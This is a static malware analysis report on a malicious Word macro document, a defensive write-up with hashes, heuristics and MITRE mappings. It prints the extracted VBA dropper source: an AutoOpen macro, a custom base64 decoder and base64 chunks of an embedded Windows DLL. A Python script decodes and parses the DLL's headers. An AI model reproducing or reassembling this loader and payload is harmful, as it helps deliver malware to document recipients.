Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5766758c51c678d7…

MALICIOUS

Office (OOXML)

Size: 66.6 KB
Created: 2019-12-24 21:03:00 UTC (document metadata)
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-09-07
MD5: 0a222cc47b33e66646781732d40009a8
SHA-1: df6619f7ace034bd7109e4fddb48a71282152d1e
SHA-256: 5766758c51c678d7f26a68947be2352ee091773239c4ffbbd62ed72cfbd8afdf
Risk score: 312

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1140 Deobfuscate/Decode Files or Information

The sample is an OOXML Word document carrying a VBA project. The ThisDocument module defines an AutoOpen macro whose only statement is a call to a procedure named 'cute'; 'cute' itself is not within the preview below, so the execution step cannot be read from the visible source. What is visible is a hand-written base64 decoder ('eco', using the standard A-Z, a-z, 0-9, '+', '/' alphabet) and a series of functions (get_Top, get_oop, get_yes, ...) that each return three fixed-size chunks of one encoded blob. The first chunk begins 'TVqQAAMAAAAEAAAA', which is the base64 encoding of an MZ DOS header, and the stub text 'This program cannot be run in DOS mode' follows a few bytes later. Decoding the header chunks gives a 32-bit PE image (machine 0x014C, five sections named .text/.rdata/.data/.rsrc/.reloc, PE32 optional header) whose file characteristics (0x2102) include the DLL flag. The payload is therefore embedded in the document rather than fetched by the macro. The chunks contain '-' characters, which 'eco' rejects (it exits on any character outside its alphabet), so a substitution must be applied somewhere in the code that is not shown before decoding; a tool that base64-decodes the chunks as found gets garbage. This decode-then-execute shape is what the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic describes. No CreateObject, Shell or URL string appears in the visible source; the execution tokens reported come from the compiled p-code stream (OLE_VBA_PCODE_AUTOEXEC_EXEC). The ClamAV signature Doc.Dropper.Downloader-6398288-0 matched the raw VBA project stream (vbaProject_00.bin), not the decoded source (macros.bas). Its name classifies the document as a downloader; the static evidence here establishes a dropper of an embedded DLL, and whether that DLL downloads further stages cannot be determined from this report.

Heuristics (9)

  • ClamAV: Doc.Dropper.Downloader-6398288-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Downloader-6398288-0
  • VBA project inside OOXML medium (4 related findings) OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All 15 extracted URLs are XML namespace identifiers from the document's own OOXML markup (schemas.openxmlformats.org and schemas.microsoft.com); none is a network indicator for this sample.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 34205 bytes
SHA-256: 31dcbdbdf3adb8a5f2dfef8bb64ede69c812ac84bb86001f25affc08633ab579
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 53 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AutoOpen()
    Call cute
End Sub

Private Function eco(ase) As Byte()
    Const able = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

    If 0 <> Len(ase) Mod 4 Then
        Exit Function
    End If

    utL = (Len(ase) / 4) * 3
    If "=" = Mid(ase, Len(ase), 1) Then
        utL = utL - 1
    End If
    If "=" = Mid(ase, Len(ase) - 1, 1) Then
        utL = utL - 1
    End If

    Dim ecoytes() As Byte
    ReDim ecoytes(utL - 1)
    utp = 0

    For quartet = 1 To Len(ase) Step 4
        umber = 0
        Const base = 64
        esIn = 3
        For i = 0 To 3
            inar = Mid(ase, quartet + i, 1)
            iale = 0

            If "=" = inar Then
                esIn = esIn - 1
            Else
                iale = InStr(1, able, inar, vbBinaryCompare) - 1
            End If

            If -1 = iale Then
                Exit Function
            End If

            umber = (umber * base) + iale
        Next

        umber = Hex(umber)

        umber = String(6 - Len(umber), "0") & umber

        ecoytes(utp) = CByte("&H" & Mid(umber, 1, 2))
        utp = utp + 1
        If esIn > 1 Then
            ecoytes(utp) = CByte("&H" & Mid(umber, 3, 2))
            utp = utp + 1
            If esIn > 2 Then
                ecoytes(utp) = CByte("&H" & Mid(umber, 5, 2))
                utp = utp + 1
            End If
        End If
    Next

    eco = ecoytes
End Function

Private Function get_Top() As String
    Dim Top1 As String
    Dim Top2 As String
    Dim Top3 As String
    Top1 = "TVqQAAMAAAAEAAAA--8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAD2Dg8Csm9hUbJvYVGyb2FRuxfyUbpvYVG5AGRQom9hUbkAZVC5b2FRuQBiULBvYVG5AGBQ"
    Top2 = "tm9hUekHZVCwb2FR6QdgULVvYVGyb2BR829hUXQAaFCwb2FRdABhULNvYVF0AJ5Rs29hUXQAY1Czb2FRUmljaLJvYVEAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQDylgxfAAAAAAAAAADgAAIhCwEOGQAoAAAAHgAAAAAAAEArAAAAEAAAAEAAAAAAABAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAkAAAAAQAAAAAAAADAEAB"
    Top3 = "AAAQAAAQAAAAABAAABAAAAAAAAAQAAAAYEoAAFAAAACwSgAAyAAAAABwAADgAQAAAAAAAAAAAAAAAAAAAAAAAACAAACwAgAAwEMAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD4QwAAQAAAAAAAAAAAAAAAAEAAAAQBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAB0nAAAAEAAAACgAAAAEAAAAAAAA"
    get_Top = Top1 + Top2 + Top3
End Function

Private Function get_oop() As String
    Dim oop1 As String
    Dim oop2 As String
    Dim oop3 As String
    oop1 = "AAAAAAAAAAAgAABgLnJkYXRhAAB2EQAAAEAAAAASAAAALAAAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAFAQAAABgAAAAAgAAAD4AAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAAOABAAAAcAAAAAIAAABAAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAACwAgAAAIAAAAAEAAAAQgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAA"
    oop2 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    oop3 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGpkaFhIABDopCUAAIvai-Ez-4l93Il91Il94Il9zIl90Ff-FfhAABCJffyNRdhQaChBABBqAVdo"
    get_oop = oop1 + oop2 + oop3
End Function

Private Function get_yes() As String
    Dim yes1 As String
    Dim yes2 As String
    Dim yes3 As String
    yes1 = "OEEAEP8V9EAAEIXAdCVq-o1N8FFoBGAAEOi0JQAAg8QMsAGLTfBkiQ0AAAAAWV9eW8nDaghYZolFvIl1xItF2IsIjVXcUoPsEI11vIv8paWlpVD-USSDfdwAdRGLRdiLCFD-UQhq-o1F8FDrp2oIWGaJRayJXbSLRdiLCI1V1FKD7BCNdayL-KWlpaVQ-1Eki0XciwiDfdQAdQZQ-1EI67uNVdBSUP9RLItN0IXJdRCLRdSL"
    yes2 = "CFD-UQiLRdyLCOvbiwGNVeBSUf9QHItF0IsIg33gAX05UP9RCItF1IsIUP9RCItF3IsIUP9RCItF2Is
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 128000 bytes
SHA-256: a72d9038443a02f637fddc3e9b638d90756d158f70d853b0ecbcc2c35a7423bf
Detection
ClamAV: Doc.Dropper.Downloader-6398288-0
Obfuscation or payload: likely
Carved artifact contains 149 long base64-like blob(s).
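The following is an added worked example written for this report; it is not code from the sample or from the analysis tooling. It ports the macro's 'eco' decoder to Python, shows that the decoder rejects the chunks exactly as they appear in the preview, and then reads the embedded PE's DOS, COFF and section headers from the first four chunks (Top1..Top3 and oop1, copied from the macros.bas preview above). One assumption is labelled in the code: that the unseen 'cute' procedure turns '-' back into '/' before calling 'eco'. That is the only substitution consistent with a valid DOS header (the '--8A' group must decode to the 0xFFFF e_maxalloc field), but it is inferred, not read from the source.

```python
import struct
from datetime import datetime, timezone

# Chunks copied verbatim from get_Top() and get_oop() in the macros.bas
# preview above (Top1..Top3 and oop1). Together they cover the first 720
# bytes of the embedded image: DOS header, DOS stub, Rich header, COFF header,
# optional header and the five section headers.
TOP1 = "TVqQAAMAAAAEAAAA--8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAD2Dg8Csm9hUbJvYVGyb2FRuxfyUbpvYVG5AGRQom9hUbkAZVC5b2FRuQBiULBvYVG5AGBQ"
TOP2 = "tm9hUekHZVCwb2FR6QdgULVvYVGyb2BR829hUXQAaFCwb2FRdABhULNvYVF0AJ5Rs29hUXQAY1Czb2FRUmljaLJvYVEAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQDylgxfAAAAAAAAAADgAAIhCwEOGQAoAAAAHgAAAAAAAEArAAAAEAAAAEAAAAAAABAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAkAAAAAQAAAAAAAADAEAB"
TOP3 = "AAAQAAAQAAAAABAAABAAAAAAAAAQAAAAYEoAAFAAAACwSgAAyAAAAABwAADgAQAAAAAAAAAAAAAAAAAAAAAAAACAAACwAgAAwEMAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD4QwAAQAAAAAAAAAAAAAAAAEAAAAQBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAB0nAAAAEAAAACgAAAAEAAAAAAAA"
OOP1 = "AAAAAAAAAAAgAABgLnJkYXRhAAB2EQAAAEAAAAASAAAALAAAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAFAQAAABgAAAAAgAAAD4AAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAAOABAAAAcAAAAAIAAABAAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAACwAgAAAIAAAAAEAAAAQgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAA"

# Same alphabet as the Const 'able' inside the macro's eco() function.
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def eco(ase: str):
    """Python port of the macro's eco(). Returns None wherever the VBA version
    hits Exit Function: length not a multiple of 4, or a character outside its
    alphabet (InStr returns 0, so 'iale' becomes -1)."""
    if len(ase) % 4:
        return None
    out = bytearray()
    for q in range(0, len(ase), 4):
        number, keep = 0, 3                 # 'umber' and 'esIn' in the VBA
        for ch in ase[q:q + 4]:
            if ch == "=":
                keep -= 1                   # padding: one fewer output byte
                value = 0
            else:
                value = ALPHABET.find(ch)
                if value < 0:
                    return None             # VBA: If -1 = iale Then Exit Function
            number = number * 64 + value
        # VBA pads Hex(umber) to six digits and takes it two digits at a time;
        # that is just the 24-bit value split into three big-endian bytes.
        out += number.to_bytes(3, "big")[:keep]
    return bytes(out)


def decode_payload_prefix(chunks):
    """ASSUMPTION (not visible in the preview): the unseen cute() restores '/'
    where the stored chunks have '-' before calling eco(). The DOS header
    requires it: '--8A' must decode to FF FF 00 (e_maxalloc = 0xFFFF)."""
    decoded = eco("".join(chunks).replace("-", "/"))
    if decoded is None:
        raise ValueError("chunks still contain characters outside eco()'s alphabet")
    return decoded


def parse_pe_header(blob: bytes) -> dict:
    """Read the DOS header, COFF file header, optional-header magic and the
    section table from the start of a PE image. Only header bytes are needed."""
    if blob[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsect, stamp, _symtab, _nsyms, opt_size, flags = struct.unpack_from(
        "<HHIIIHH", blob, e_lfanew + 4)
    (magic,) = struct.unpack_from("<H", blob, e_lfanew + 24)   # optional header starts here
    sect_base = e_lfanew + 24 + opt_size
    sections = []
    for i in range(nsect):
        name, vsize, vaddr, rsize, rptr = struct.unpack_from("<8sIIII", blob, sect_base + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii"),
                         "vsize": vsize, "vaddr": vaddr, "raw_size": rsize, "raw_ptr": rptr})
    return {
        "machine": machine,                      # 0x014C = IMAGE_FILE_MACHINE_I386
        "pe32": magic == 0x10B,                  # PE32 (not PE32+)
        "is_dll": bool(flags & 0x2000),          # IMAGE_FILE_DLL
        "timestamp": datetime.fromtimestamp(stamp, timezone.utc),
        "sections": sections,
    }


def describe_embedded_pe(chunks=(TOP1, TOP2, TOP3, OOP1)) -> dict:
    """Decode the header chunks and summarise the embedded image."""
    return parse_pe_header(decode_payload_prefix(chunks))


if __name__ == "__main__":
    info = describe_embedded_pe()
    print(f"machine=0x{info['machine']:04x} pe32={info['pe32']} dll={info['is_dll']} "
          f"linked={info['timestamp'].isoformat()}")
    for s in info["sections"]:
        print(f"  {s['name']:<8} va=0x{s['vaddr']:05x} raw=0x{s['raw_size']:05x} @0x{s['raw_ptr']:05x}")
```

Two things the output adds to the report: the COFF timestamp the parser recovers (2020-07-13) lies between the document's Created metadata (2019-12-24) and its first-seen date (2020-09-07), so the DLL was linked months after the Word metadata says the lure was created; both values are attacker-controllable, but the mismatch is worth recording. And the raw chunks never decode with a stock base64 routine, which is why the blob-counting heuristic flags them as "base64-like" rather than decoding them. The preview shows no '+' either, so how that alphabet character is stored cannot be told from this view.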